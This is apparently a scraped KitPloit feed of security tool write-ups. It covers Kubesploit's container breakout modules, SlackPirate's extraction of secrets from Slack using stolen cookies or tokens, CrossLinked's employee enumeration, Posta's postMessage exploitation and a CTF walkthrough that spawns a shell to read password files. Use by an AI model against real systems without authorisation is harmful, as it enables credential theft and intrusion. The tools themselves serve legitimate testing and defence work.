Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

Dnspeep - Spy On The DNS Queries Your Computer Is Making

$
0
0


dnspeep lets you spy on the DNS queries your computer is making.

Here's some example output:

$ sudo dnspeep
query name server IP response
A incoming.telemetry.mozilla.org 192.168.1.1 CNAME: telemetry-incoming.r53-2.services.mozilla.com, CNAME: pipeline-incoming-prod-elb-149169523.us-west-2.elb.amazonaws.com, A: 52.39.144.189, A: 54.191.136.131, A: 34.215.151.143, A: 54.149.208.57, A: 44.226.235.191, A: 52.10.174.113, A: 35.160.138.173, A: 44.238.190.78
AAAA incoming.telemetry.mozilla.org 192.168.1.1 CNAME: telemetry-incoming.r53-2.services.mozilla.com, CNAME: pipeline-incoming-prod-elb-149169523.us-west-2.elb.amazonaws.com
A www.google.com 192.168.1.1 A: 172.217.13.132
AAAA www.google.com 192.168.1.1 AAAA: 2607:f8b0:4020:807::2004
A www.neopets.com 192.168.1.1 CNAME: r9c3n8d2.stackpathcdn.com, A: 151.139.128.11
AAAA www.neopets.com 192.168.1.1 CNAME: r9c3n8d2.stackpathcdn.com


How to install

You can install dnspeep using the different methods below.


Installing the binary release
  1. Download recent release of dnspeep from the GitHub releases page
  2. Unpack it
  3. Put the dnspeep binary in your PATH (for example in /usr/local/bin)

Compile and installing from source
  1. Download recent source release of dnspeep from the GitHub releases page or git clone this repository.
  2. Unpack it
  3. Run cargo build --release
  4. Change to the "target/release" directory there.
  5. Put the dnspeep binary in your PATH (for example in /usr/local/bin)

Installing from a Linux package manager
  • If you are using Arch Linux, then you can install dnspeep from the AUR.

How it works

It uses libpcap to capture packets on port 53, and then matches up DNS request and response packets so that it can show the request and response together on the same line.

It also tracks DNS queries which didn't get a response within 1 second and prints them out with the response <no response>.


Limitations
  • Only supports the DNS query types supported by the dns_parser crate (here's a list)
  • Doesn't support TCP DNS queries, only UDP
  • It can't show DNS-over-HTTPS queries (because it would need to MITM the HTTPS connection)



Kubesploit - A Cross-Platform Post-Exploitation HTTP/2 Command And Control Server And Agent Written In Golang

$
0
0


Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent dedicated for containerized environments written in Golang and built on top of Merlin project by Russel Van Tuyl (@Ne0nd0g).


Our Motivation

While researching Docker and Kubernetes, we noticed that most of the tools available today are aimed at passive scanning for vulnerabilities in the cluster, and there is a lack of more complex attack vector coverage.
They might allow you to see the problem but not exploit it. It is important to run the exploit to simulate a real-world attack that will be used to determine corporate resilience across the network.
When running an exploit, it will practice the organization's cyber event management, which doesn't happen when scanning for cluster issues.
It can help the organization learn how to operate when real attacks happen, see if its other detection system works as expected and what changes should be made.
We wanted to create an offensive tool that will meet these requirements.

But we had another reason to create such a tool. We already had two open-source tools (KubiScan and kubeletctl) related to Kubernetes, and we had an idea for more. Instead of creating a project for each one, we thought it could be better to make a new tool that will centralize the new tools, and this is when Kubesploit was created.

We searched for an open-source that provide that heavy lifting for a cross-platform system, and we found Merlin, written by Russel Van Tuyl (@Ne0nd0g), to be suitable for us.

Our main goal is to contribute to raising awareness about the security of containerized environments, and improve the mitigations implemented in the various networks. All of this captured through a framework that provides the appropriate tools for the job of PT teams and Red Teamers during their activities in these environments. Using these tools will help you estimate these environments' strengths and make the required changes to protect them.


What's New

As the C&C and the agent infrastructure were done already by Merlin, we integrated Go interpreter ("Yaegi") to be able to run Golang code from the server to the agent.
It allowed us to write our modules in Golang, provide more flexibility on the modules, and dynamically load new modules. It is an ongoing project, and we are planning to add more modules related to Docker and Kubernetes in the future.

The currently available modules are:

  • Container breakout using mounting
  • Container breakout using docker.sock
  • Container breakout using CVE-2019-5736 exploit
  • Scan for Kubernetes cluster known CVEs
  • Port scanning with focus on Kubernetes services
  • Kubernetes service scan from within the container
  • Light kubeletctl containing the following options:
    • Scan for containers with RCE
    • Scan for Pods and containers
    • Scan for tokens from all available containers
    • Run command with multiple options

Quick Start

We created a dedicated Kubernetes environment in Katacoda for you to experiment with Kubesploit.
It’s a full simulation with a complete set of automated instructions on how to use Kubesploit. We encourage you to explore it.



Build

To build this project, run the make command from the root folder.


Quick Build

To run quick build for Linux, you can run the following:

export PATH=$PATH:/usr/local/go/bin
go build -o agent cmd/merlinagent/main.go
go build -o server cmd/merlinserver/main.go

Mitigations

YARA rules

We created YARA rules that will help to catch Kubesploit binaries. The rules are written in the file kubesploit.yara.


Agent Recording

Every Go module loaded to the agent is being recorded inside the victim machine.


MITRE map

We created a MITRE map of the vectors attack being used by Kubesploit.



Mitigation for Modules

For every module we created, we wrote its description and how to defend from it.
We sum it up in the MITIGATION.md file.


Contributing

We welcome contributions of all kinds to this repository.
For instructions on how to get started and descriptions of our development workflows, please see our contributing guide.


Credit

We want to thank Russel Van Tuyl (@Ne0nd0g) for creating Merlin as an open-source that allowed us to build Kubesploit on top of it.
We also want to thank Traefik Labs (@traefik) for creating Go interpreter ("Yaegi") that allowed us to run the Golang modules on a remote agent easily.


Share Your Thoughts And Feedback

For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) from CyberArk Labs or open an issue. You can find more projects developed by us at https://github.com/cyberark/.



Vulnerablecode - A Free And Open Vulnerabilities Database And The Packages They Impact And The Tools To Aggregate And Correlate These Vulnerabilities

$
0
0


VulnerableCode is a free and open database of FOSS software package vulnerabilities and the tools to create and keep the data current.

It is made by the FOSS community to improve and secure the open source software ecosystem.


Why?

The existing solutions are commercial proprietary vulnerability databases, which in itself does not make sense because the data is about FOSS (Free and Open Source Software).

The National Vulnerability Database which is a primary centralized data source for known vulnerabilities is not particularly well suited to address FOSS security issues because:

  1. It predates the explosion of FOSS software usage
  2. It's data format reflects a commercial vendor-centric point of view in part due to the usage of CPE to map vulnerabilities to existing packages.
  3. CPEs are just not designed to map FOSS to vulnerabilities owing to their vendor-product centric semantics. This makes it really hard to answer the fundamental questions "Is package foo vulnerable" and "Is package foo vulnerable to vulnerability bar?"

How

VulnerableCode independently aggregates many software vulnerability data sources and supports data re-creation in a decentralized fashion. These data sources (see complete list here) include security advisories published by Linux and BSD distributions, application software package managers and package repositories, FOSS projects, GitHub and more. Thanks to this approach, the data is focused on specific ecosystems yet aggregated in a single database that enables querying a richer graph of relations between multiple incarnations of a package. Being specific increases the accuracy and validity of the data as the same version of an upstream package across different ecosystems may or may not be vulnerable to the same vulnerability.

The packages are identified using Package URL PURL as primary identifiers rather than CPEs. This makes answers to questions such as "Is package foo vulnerable to vulnerability bar?" much more accurate and easy to interpret.

The primary access to the data is through a REST API.

In addition, an emerging web interface goal is to support vulnerabilities data browsing and search and progressively to enable community curation of the data with the addition of new packages and vulnerabilities, and reviewing and updating their relationships.

We also plan to mine for vulnerabilities which didn't receive any exposure due to various reasons like but not limited to the complicated procedure to receive CVE ID or not able to classify a bug as a security compromise.

Recent presentations:


Setting up VulnerableCode

First clone the source code:

git clone https://github.com/nexB/vulnerablecode.git
cd vulnerablecode

Using Docker Compose

An easy way to set up VulnerableCode is with docker containers and docker compose. For this you need to have the following installed.

  • Docker Engine. Find instructions to install it here
  • Docker Compose. Find instructions to install it here

Use sudo docker-compose up to start VulnerableCode. Then access VulnerableCode at http://localhost:8000/ or at http://127.0.0.1:8000/

Important: Don't forget to run sudo docker-compose up -d --no-deps --build web to sync your instance after every git pull.

Use sudo docker-compose exec web bash to access the VulnerableCode container. From here you can access manage.py and run management commands to import data as specified below.


Without Docker Compose

System requirements

  • Python 3.8+
  • PostgreSQL 9+
  • Compiler toolchain and development files for Python and PostgreSQL

On Debian-based distros, these can be installed with:

sudo apt-get install python3-venv python3-dev postgresql libpq-dev build-essential

Database configuration

  • Create a user named vulnerablecode. Use vulnerablecode as password when prompted:

    sudo -u postgres createuser --no-createrole --no-superuser --login \
    --inherit --createdb --pwprompt vulnerablecode``
  • Create a databased named vulnerablecode:

    createdb --encoding=utf-8 --owner=vulnerablecode  --user=vulnerablecode \
    --password --host=localhost --port=5432 vulnerablecode

Application dependencies

Create a virtualenv, install dependencies, generate static files and run the database migrations:

python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
DJANGO_DEV=1 python manage.py collectstatic
DJANGO_DEV=1 python manage.py migrate

The environment variable DJANGO_DEV is used to load settings suitable for development, defined in vulnerablecode/dev.py. If you don't want to type it every time use export DJANGO_DEV=1 instead. Do not use DJANGO_DEV in a production environment.

For a production mode, an environment variable named SECRET_KEY needs to be set. The recommended way to generate this key is to use the code Django includes for this purpose:

SECRET_KEY=$(python -c "from django.core.management import utils; print(utils.get_random_secret_key())")

You will also need to setup the VC_ALLOWED_HOSTS environment variable to match the hostname where the app is deployed:

VC_ALLOWED_HOSTS=vulnerablecode.your.domain.example.com

You can specify several host by separating them with a colon :


Using Nix

You can install VulnerableCode with Nix (Flake support is needed):

cd etc/nix
nix-shell -p nixFlakes --run "nix --print-build-logs flake check " # build & run tests

There are several options to use the Nix version:

# Enter an interactive environment with all dependencies set up.
cd etc/nix
nix develop
> ../../manage.py ... # invoke the local checkout
> vulnerablecode-manage.py ... # invoke manage.py as installed in the nix store

# Test the import prodecure using the Nix version.
etc/nix/test-import-using-nix.sh --all # import everything
# Test the import using the local checkout.
INSTALL_DIR=. etc/nix/test-import-using-nix.sh ruby # import ruby only

Keeping the Nix setup in sync

The Nix installation uses mach-nix to handle Python dependencies because some dependencies are currently not available as Nix packages. All Python dependencies are automatically fetched from ./requirements.txt. If the mach-nix-based installation fails, you might need to update mach-nix itself and the pypi-deps-db version in use (see etc/nix/flake.nix:inputs.machnix and machnixFor.pypiDataRev).

Non-Python dependencies are curated in:

etc/nix/flake.nix:vulnerablecode.propagatedBuildInputs

Run Tests

Use these commands to run code style checks and the test suite:

black -l 100 --check .
DJANGO_DEV=1 python -m pytest

Data import

Some data importers use the GitHub APIs. For this, export the GH_TOKEN environment variable with:

export GH_TOKEN=yourgithubtoken

See GitHub docs for instructions on how to obtain your GitHub token.

To run all data importers use:

DJANGO_DEV=1 python manage.py import --all

To list available importers use:

DJANGO_DEV=1 python manage.py import --list

To run specific importers:

DJANGO_DEV=1 python manage.py import rust npm

REST API access

Start the webserver:

DJANGO_DEV=1 python manage.py runserver

For full documentation about API endpoints use this URL:

http://127.0.0.1:8000/api/docs

Continuous periodic Data import

If you want to run the import periodically, you can use a systemd timer:

$ cat ~/.config/systemd/user/vulnerablecode.service

[Unit]
Description=Update vulnerability database

[Service]
Type=oneshot
Environment="DJANGO_DEV=1"
ExecStart=/path/to/venv/bin/python /path/to/vulnerablecode/manage.py import --all

$ cat ~/.config/systemd/user/vulnerablecode.timer

[Unit]
Description=Periodically update vulnerability database

[Timer]
OnCalendar=daily

[Install]
WantedBy=multi-user.target

Start this "timer" with:

systemctl --user daemon-reload
systemctl --user start vulnerablecode.timer


CrossLinked - LinkedIn Enumeration Tool To Extract Valid Employee Names From An Organization Through Search Engine Scraping

$
0
0


CrossLinked is a LinkedIn enumeration tool that uses search engine scraping to collect valid employee names from a target organization. This technique provides accurate results without the use of API keys, credentials, or even accessing the site directly. Formats can then be applied in the command line arguments to turn these names into email addresses, domain accounts, and more.

For a full breakdown of the tool and example output, checkout:
https://m8r0wn.com/posts/2021/01/crosslinked.html


Setup
git clone https://github.com/m8r0wn/crosslinked
cd crosslinked
pip3 install -r requirements.txt

Examples

Results are written to a 'names.txt' file in the current directory unless specified in the command line arguments. See the Usage section for additional options.

python3 crosslinked.py -f '{first}.{last}@domain.com' company_name
python3 crosslinked.py -f 'domain\{f}{last}' -t 45 -j 1 company_name

Usage
positional arguments:
company_name Target company name

optional arguments:
-h, --help show this help message and exit
-t TIMEOUT Max timeout per search (Default=20, 0=None)
-j JITTER Jitter between requests (Default=0)
-v Show names and titles recovered after enumeration

Search arguments:
-H HEADER Add Header ('name1=value1;name2=value2;')
--search ENGINE Search Engine (Default='google,bing')
--safe Only parse names with company in title (Reduces false positives)

Output arguments:
-f NFORMAT Format names, ex: 'domain\{f}{last}', '{first}.{last}@domain.com'
-o OUTFILE Change name of output file (default=names.txt

Proxy arguments:
--proxy PROXY Proxy requests (IP:Port)
--proxy-file PROXY Load proxies from file for rotation

Proxy Support

The latest version of CrossLinked provides proxy support through the Taser library. Users can mask their traffic with a single proxy by adding --proxy 127.0.0.1:8080 to the command line arguments, or use --proxy-file proxies.txt for rotating source addresses.

http/https proxies can be added in IP:PORT notation, while SOCKS requires a socks4:// or socks5:// prefix.



IPCDump - Tool For Tracing Interprocess Communication (IPC) On Linux

$
0
0


Announcement post

ipcdump is a tool for tracing interprocess communication (IPC) on Linux. It covers most of the common IPC mechanisms -- pipes, fifos, signals, unix sockets, loopback-based networking, and pseudoterminals. It's a useful tool for debugging multi-process applications, and it's also a simple way to understand how the different moving parts in your system communicate with one another. ipcdump can trace both the metadata and the contents of this communication, and it's particularly well-suited to tracing IPC between short-lived processes, which can be difficult using traditional debugging tools, like strace or gdb. It also has some basic filtering capabilities to help you sift through large quantities of event s. Most of the information ipcdump collects comes from BPF hooks placed on kprobes and tracepoints at key functions in the kernel, although it also fills in some bookkeeping from the /proc filesystem. To this end ipcdump makes heavy use of gobpf, which provides golang binding for the bcc framework.


Requirements & Usage
  • golang >= 1.15.6

Tested operating systems and kernels
Ubuntu 18.04 LTSUbuntu 20.04 LTS
4.15.0TestedNot Tested
5.4.0Not TestedTested
5.8.0Not TestedTested*

*Requires building bcc from source


Building

Dependencies
  1. Install golang
snap install go --classic

or directly from golang website

  1. Install BCC using iovisor's instructions depending on the operation system you chose (usually the newer versions will require building from source)

Building ipcdump
git clone https://github.com/guardicore/IPCDump
cd IPCDump/cmd/ipcdump
go build

Usage
./ipcdump -h
Usage of ./ipcdump:
-B uint
max number of bytes to dump per event, or 0 for complete event (may be large). meaningful only if -x is specified.
-D value
filter by destination comm (can be specified more than once)
-L do not output lost event information
-P value
filter by comm (either source or destination, can be specified more than once)
-S value
filter by source comm (can be specified more than once)
-c uint
exit after <count> events
-d value
filter by destination pid (can be specified more than once)
-f string
<text|json> output format (default is text) (default "text")
-p value
filter by pid (either source or destination, can be specified more than once)
-s value
filter by source pid (can be specified more than once)
-t value
filter by type (can be specif ied more than once).
possible values: a|all k|signal u|unix ud|unix-dgram us|unix-stream t|pty lo|loopback lt|loopback-tcp lu|loopback-udp p|pipe
-x dump IPC bytes where relevant (rather than just event details).

One-liners

Run as root:

# dump all ipc on the system
./ipcdump

# dump signals sent between any two processes
./ipcdump -t kill

# dump loopback TCP connection metadata to or from pid 1337
./ipcdump -t loopback-tcp -p 1337

# dump unix socket IPC metadata and contents from Xorg
./ipcdump -t unix -x -S Xorg

# dump json-formatted pipe i/o metadata and first 64 bytes of contents
./ipcdump -t pipe -x -B 64 -f json

Features
  • Support for pipes and FIFOs
  • Loopback IPC
  • Signals (regular and realtime)
  • Unix streams and datagrams
  • Pseudoterminal-based IPC
  • Event filtering based on process PID or name
  • Human-friendly or JSON-formatted output

Design

ipcdump is built of a series of collectors, each of which is in charge of a particular type of IPC event. For example, IPC_EVENT_LOOPBACK_SOCK_UDP or IPC_EVENT_SIGNAL.

In practice, all of the collectors are built using bpf hooks attached to kprobes and tracepoints. Their implementations are entirely separate, though -- there's no particular reason to assume our information will always come from bpf. That said, the different collectors do have to share a single bpf module, because there's some common code that they need to share. To this end, we share a single BpfBuilder (which is essentially a wrapper around concatenating strings of bcc code) and each collector registers its own code with that builder. The full bcc script is then loaded with gobpf, and each module places the hooks it needs.

There are currently two kinds of bookkeeping that are shared between IPC collectors:

  • SocketIdentifier (internal/collection/sock_id.go) -- maps between kernelstruct sock* and the processes that use them.
  • CommIdentifier (internal/collection/comm_id.go) -- maps between pid numbers and the corresponding process name (/proc/<pid>/comm). The bookkeeping done in each of these is particularly important for short-lived processes; while this information can be filled out later in usermode by parsing /proc, often the relevant process will have disappeared by the time the event hits the handler. That said, we do sometimes fill in information from /proc. This happens mostly for processes that existed before ipcdump was run; we won't catch events like process naming in this case. SocketIdentifier and CommIdentifier sort of try and abstract this duality between bcc code and /proc parsing behind a single API, although it's not super-clean. By the way, in super-new versions of Linux (5.8), bpf iterators can entirely replace this bookkeeping, although for backwards compatibility we should probably stick to the hooks-and-procfs paradigm for now.

Event output is done through the common EmitIpcEvent() function, which takes a standard event format (source process, dest process, metadata key-value pairs, and contents) and outputs it in a unified format. To save event bandwidth, collectors typically don't output IPC contents if the -x flag isn't specified. This is done with some fancy preprocessing magic in internal/collection/ipc_bytes.go.


Contributing

Please do! Check out TODO for the really important stuff. Most of the early work on ipcdump will probably involve making adjustments for different kernel versions and symbols.



SlackPirate - Slack Enumeration And Extraction Tool - Extract Sensitive Information From A Slack Workspace

$
0
0


This is a tool developed in Python which uses the native Slack APIs to extract 'interesting' information from a Slack workspace given an access token.

As of May 2018, Slack has over 8 million customers and that number is rapidly rising - the integration and 'ChatOps' possibilities are endless and allows teams (not just developers!) to create some really powerful workflows and Slack bot/application interactions.


As is the way with corporations large and small, it is not unusual for tools such as Slack to fly under the Information Security governance/policy radar which ultimately leads to precarious situations whereby sensitive and confidential information end up in places they shouldn't be.

The purpose of this tool is two-fold:

  • Red-teamers can use this to identify and extract sensitive information, documents, credentials, etc from Slack given a low-privileged account to the organisation's Workspace. This could allow an attacker to pivot on to other systems and/or gain far more intimate knowledge and inner-workings of corporate systems/applications
  • Blue-teamers can use this to identify and detect sensitive information on the Workspace that perhaps shouldn't exist on there in the first instance. Blue-teamers can use this information for internal training and awareness purposes by demonstrating the output of the tool and the type of 'things' that could be used and abused by (internal as well as external) attackers.

The tool allows you to easily gather sensitive information for offline viewing at your convenience.

Note: I'm a Python n00b and have no doubt that the script can be optimised and improved massively - please feel free to make pull requests; I'll review and merge them as appropriate!


Information Gathering

The tool uses the native Slack APIs to extract 'interesting' information and looks for the following information, today:

  • Print to standard output the domains (if any) that are allowed to register for the Workspace - I've seen stale, old and forgotten domains here that can be purchased and used to register for the Workspace
  • Links to S3 buckets
  • Passwords
  • AWS Access/Secret keys
  • Private Keys
  • Pinned messages across all Channels
  • References to links and URLs that could provide further access to sensitive materials - think: Google Docs, Trello Invites, links to internal systems, etc
  • Files which could contain sensitive information such as .key, .sh, the words "password" or "secret" embedded in a document, etc

Slack Cookie

The Slack web application uses a number of cookies - the one of special interest is called, wait for it... d. This d cookie is the same across all Workspaces the victim has access to. What this means in reality is that a single stolen d cookie would allow an attacker to get access to all of the Workspaces the victim is logged-in to; my experience with the Slack web application is that once you are logged in, you'll remain logged in indefinitely.


Slack Token

The Slack API token is a per-workspace token. One token cannot (as far as I know) access other workspaces in the same way the d cookie above allows access to all Workspaces.

For the tool to search for and extract information, you will need to provide it an API token. There are two straight forward ways of doing this:

  • Provide the tool a d cookie by using the --cookie flag. The tool will output the associated Workspaces and tokens
  • Provide the tool with a token directly by using the --token flag. You can find this by viewing the source of the Workspace URL and doing a search for XOX

The token will look something like this:

api_token: "xoxs-x-x-x-x"

Make a copy of that and pass that in to the script using the --token flag.


Building

The script has been developed, tested and confirmed working on Python 3.5, 3.6 and 3.7. A quick test on Python 2 presented some compatibility issues.


Linux with virtualenv
  • git clone https://github.com/emtunc/SlackPirate
  • pip install virtualenv
  • virtualenv SlackPirate
  • source SlackPirate/bin/activate
  • pip install -r requirements.txt
  • ./SlackPirate.py --help

Linux without virtualenv
  • git clone https://github.com/emtunc/SlackPirate
  • chmod +x SlackPirate.py
  • pip install -r requirements.txt
  • ./SlackPirate.py --help

Windows with virtualenv
  • git clone https://github.com/emtunc/SlackPirate
  • pip install virtualenv
  • virtualenv SlackPirate
  • SlackPirate\Scripts\activate.bat
  • pip install -r requirements.txt
  • python SlackPirate.py --help

Windows without virtualenv
  • git clone https://github.com/emtunc/SlackPirate
  • pip install -r requirements.txt
  • python SlackPirate.py --help

Usage

python3 SlackPirate.py --help

  • Display the help menu - this includes information about all scan modules you can explicitly select or ignore

python3 SlackPirate.py --interactive

  • Interactive mode instructs the tool to allow you to provide a token or cookie, and choose scans to run through a console UI rather than via command line arguments.

python3 SlackPirate.py --cookie <cookie>

This will do the following:

  • Find any associated Workspaces that can be accessed using that cookie
  • Connect to any Workspaces that were returned
  • Look for API Tokens in each returned Workspace
  • Print to standard output for use in the next command

python3 SlackPirate.py --token <token>

This will do the following:

  • Check Token validity and only continue if Slack returns True
  • Print to standard output if the token supplied has admin, owner or primary_owner privileges
  • Print to standard output if the tool found any @domains that can be used to register for the Slack Workspace (you may be surprised by what you find here - if you're lucky you'll find an old, unused, registerable domain here)
  • Dump team access logs in .json format if the token provided is a privileged token
  • Dump the user list in .json format
  • Find references to S3 buckets
  • Find references to passwords and other credentials
  • Find references to AWS keys
  • Find references to private keys
  • Find references to pinned messages across all Slack channels
  • Find references to interesting URLs and links
  • Lastly, the tool will attempt to download files based on pre-defined keywords

python3 SlackPirate.py --token <token> --s3-scan

  • This will instruct the tool to only run the S3 scan

python3 SlackPirate.py --token <token> --no-s3-scan

  • This will instruct the tool to run all scans apart from the S3 scan

python3 SlackPirate.py --token <token> --verbose

  • Verbose mode will output files in .CSV - will provide a lot more information such as channel names, usernames, perma-links and more.

Screenshots

 



Join the conversation

A public Slack Workspace has been set-up where anyone can join and discuss new features, changes, feature requests or simply ask for help. Here's the invite link: https://join.slack.com/t/slackpirate/shared_invite/zt-6o3d9tjq-PhbMxtM2o5ALgFkOB9V_dg



OverRide - Binary Exploitation And Reverse-Engineering (From Assembly Into C)

$
0
0


Explore disassembly, binary exploitation& reverse-engineering through 10 little challenges.

In the folder for each level you will find:

  • flag - password for next level

  • README.md - how to find password

  • source.c - the reverse engineered binary

  • dissasembly_notes.md - notes on asm

See the subject for more details.

For more gdb & exploitation fun check out the previous project RainFall.

Final Score 125/100

Getting Started

First download from 42 OverRide.iso.


Virtual Machine setup

On Mac OSX, install VirtualBox.

In VirtualBox create a new VM (click new).

  • Name and operating system - Type: Linux, Version: (Oracle 64-bit)

Continue through all the next steps with the default settings:

  • Memory size: 4MB
  • Hard disk: Create a disk now
  • Hard disk file type: VDI(VirtualBox Disk Image)
  • Storage on physical hard disk: Dynamically allocated
  • File size: 12,00GB

Next click Settings > Network > Adapter 1 > Attached to: Bridged Adapter.

Still in settings click Storage > Right of "Controller: IDE", there is a CD icon with a + sign (add optical drive). Click Add Disk Image, and select OverRide.iso.

Click Start to start the VM, once runnning it should show the VM IP address and prompt user to login.


SSH connect

Log in from a separate shell as user level00 with password level00.

ssh level00@{VM_IP} -p 4242



Level Up

As user level00 the goal is to read the password for user level01, found at /home/users/level01/.pass. However, user level00 does not have permissions to read this file.

In the home folder for user level00 is a binary level00 with SUID set and owner level01.



This means when we execute the binary level00, we do so with the permissions of user level01.

We must find a vulnerability in the binary level00 with gdb. Then exploit the vulnerability to run system("/bin/sh"), opening a shell as user level01 where we have permissions to read the password.

cat /home/users/level01/.pass

Then log in as user level01.

su level01


 

Repeat for each level.


Reverse-engineered binary

For each level, we reverse engineered the original source.c by examining the gdb disassembly of the binary.


Levels Overview
  • 0 - Hardcoded password

  • 1 - Ret2Libc attack

  • 2 - printf() format string attack

  • 3 - Brute force password

  • 4 - gets() stack overflow + Return-to-libc attack

  • 5 - Shellcode in env variable + printf() format string attack

  • 6 - Hash value discoverable with gdb

  • 7 - Ret2Libc Attack on unprotected data table

  • 8 - Binary backs up password via symlink

  • 9 - Off-by-one error


Team

I wrote this project in a team with the awesome @dfinnis.



Posta - Cross-document Messaging Security Research Tool

$
0
0


Posta is a tool for researching Cross-document Messaging communication. It allows you to track, explore and exploit postMessage vulnerabilities, and includes features such as replaying messages sent between windows within any attached browser.



Prerequisites
  • Google Chrome / Chromium
  • Node.js (optional)

Installation

Development Environment

Run Posta in a full development environment with a dedicated browser (Chromium):

  1. Install Posta
    git clone https://github.com/benso-io/posta
    cd posta
    npm install
  2. Launch the dedicated Chromium session using the following command:
    node posta <URL>
  3. Click on the Posta extension to navigate to the UI

Dev mode includes a local web server that serves a small testing site and the exploit page. When running in dev mode, you can access the exploit page at http://localhost:8080/exploit/


Chrome Extension

Run Posta as a Chrome / Chromium Extension:

  1. Clone the repo:
    git clone https://github.com/benso-io/posta.git
  2. Navigate to chrome://extensions
  3. Make sure Developer mode is enabled
  4. Click on Load unpacked
  5. Choose the chrome-extension directory inside Posta and upload it to your browser
  6. Load the extension
  7. Pin the extension to your browser
  8. Browse to the website you would like to examine
  9. Click on the Posta extension to navigate to the UI

Tabs

In the Tabs section we can find our main Origin, with the iframes it hosts and communicates with through the session. We can choose the specific frame by clicking on it, and observe the postMessages related to that frame only.



Messages

In the Messages section, we can inspect all postMessagetraffic being sent from the origin to its iframes, and vice versa. We can select specific communication for further examination by clicking on it. The Listeners area presents the code which is in charge of handling the communication, we can click and copy its contents for JS code observation.




Console

In the console section, we can modify the original postMessage traffic, and replay the messages with the tampered values which will be sent from the Origin to its iframe.

We should make tests and see if we can affect the behavior of the website by changing the postMessage content. If we manage to do so, it's time to try and exploit if from a different Origin, by clicking "Simulate exploit".




Exploit

Click on the "host" button inorder to navigate to the exploitation window.


 

In the Exploit section, Posta will try and host the specified origin as an iframe in order to initiate postMessage communication. Most of the time we won't be able to do so, due to X-Frame-Options being enabled on the origin website.

Therefore, in order to continue with our exploitation, we'll need to gain communication reference with our Origin by initiating the window.open method, which can be achieved by clicking on "Open as tab".

We have the console to our right which will help us modify and craft our specified payloads and test them in Cross-Origin Communication, initiated by clicking on the Exploit button.



Authors



Tscopy - Tool to parse the NTFS $MFT file to locate and copy specific files

$
0
0


Introducing TScopy

It is a requirement during an Incident Response (IR) engagement to have the ability to analyze files on the filesystem. Sometimes these files are locked by the operating system (OS) because they are in use, which is particularly frustrating with event logs and registry hives. TScopy allows the user, who is running with administrator privileges, to access locked files by parsing out their raw location in the filesystem and copying them without asking the OS.

There are other tools that perform similar functions, such as RawCopy, which we have used and is the basis for this tool. However, there are some disadvantages to RawCopy that led us to develop TScopy, including performance, size, and the ability to incorporate it in other tools.

This blog is intended to introduce TScopy but also to ask for assistance. As in all software development, the more a tool is used, the more edge cases can be found. We are asking that people try out the tool and report any bugs.


What is TScopy?

TScopy is a Python script used to parse the NTFS $MFT file to locate and copy specific files. By parsing the Master File Table (MFT), the script bypasses operating system locks on files. The script was originally based on the work of RawCopy. RawCopy is written in AutoIT and is difficult to modify for our purposes. The decision to port RawCopy to Python was done because of the need to incorporate this functionality natively into our toolset.

TScopy is designed to be run as a standalone program or included as a python module. The python implementation makes use of the python-ntfs tools found at https://github.com/williballenthin/python-ntfs. TScopy built upon the base functionality of python-ntfs to isolate the location of each file from the raw disk.


What makes TScopy different?

TScopy is written in Python and organized into classes to make it more maintainable and readable than AutoIT. AutoIT can be flagged as malicious by anti-virus or detections software because some malware has utilized its potential.

The major difference between TScopy and RawCopy is the ability to copy multiple files per execution and to cache the file structure. As shown in the image below, TScopy has options to download a single file, multiple comma delimited files, the contents of a directory, wildcarded paths (individual files or directories), and recursive directories.

TScopy caches the location of each directory and file as it iterates the target file’s full path. It then uses this cache to optimize the search for any other files, ensuring future file copies are performed much faster. This is a significant advantage over RawCopy, which iterates over the entire path for each file.


TScopy Options
.\TScopy_x64.exe -h

usage:
TScopy_x64.exe -r -o c:\test -f c:\users\tscopy\ntuser.dat
Description: Copies only the ntuser.dat file to the c:\test directory
TScopy_x64.exe -o c:\test -f c:\Windows\system32\config
Description: Copies all files in the config directory but does not copy the directories under it.
TScopy_x64.exe -r -o c:\test -f c:\Windows\system32\config
Description: Copies all files and subdirectories in the config directory.
TScopy_x64.exe -r -o c:\test -f c:\users\*\ntuser*,c:\Windows\system32\config
Description: Uses Wildcards and listings to copy any file beginning with ntuser under users accounts and recursively copies the registry hives.


Copy protected files by parsing the MFT. Must be run with Administrator privileges

optional arguments:
-h, --help show this help message and exit
-f FILE, --file FILE Full path of the file or directory to be copied.
Filenames can be grouped in a comma ',' seperated
list. Wildcard '*' is accepted.
-o OUTPUTDIR, --outputdir OUTPUTDIR
Directory to copy files too. Copy will keep paths
-i, --ignore_saved_ref_nums
Script stores the Reference numbers and path info to
speed up internal run. This option will ignore and not
save the stored MFT reference numbers and path
-r, --recursive Recursively copies directory. Note this only works with
directories.

There is a hidden option ‘--debug’, which enables the debug output.


Examples
TScopy_x64.exe -f c:\windows\system32\config\SYSTEM -o e:\outputdir  

Copies the SYSTEM registry to e:\outputdir The new file will be located at e:\outputdir\windows\system32\config\SYSTEM

TScopy_x64.exe -f c:\windows\system32\config\SYSTEM -o e:\outputdir -i  

Copies the SYSTEM registry to e:\outputdir but ignores any previous cached files and does not save the current cache to disk

TScopy_x64.exe -f c:\windows\system32\config\SYSTEM,c:\windows\system32\config\SOFTWARE -o e:\outputdir  

Copies the SYSTEM and the SOFTWARE registries to e:\outputdir

TScopy_x64.exe -f c:\windows\system32\config\ -o e:\outputdir  

Copies the contents of the directory config to e:\outputdir

TScopy_x64.exe -r -f c:\windows\system32\config\ -o e:\outputdir  

Recursively copies the contents of the directory config to e:\outputdir

TScopy_x64.exe  -f c:\users\*\ntuser.dat -o e:\outputdir  

Copies each users NTUSER.DAT file to e:\outputdir

TScopy_x64.exe  -f c:\users\*\ntuser.dat* -o e:\outputdir  

For each users copies all files that begin with NTUSER.DAT to e:\outputdi

TScopy_x64.exe  -f c:\users\*\AppData\Roaming\Microsoft\Windows\Recent,c:\windows\system32\config,c:\users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -o e:\outputdir  

For each users copies all jumplists, Registry hives, and Powershell history commands to e:\outputdi


Bug Reporting Information

Please report bugs in the issues section of the GitHub page.


Bug Fixes and Enhancements

Version 2.0
  • Issue 1: Change sys.exit to raise Exception
  • Issue 2: The double copying of files. Full name and short name.
  • Issue 3: Added the ability to recursively copy a directory
  • Issue 4: Add the support for wildcards in the path. Currently only supports *
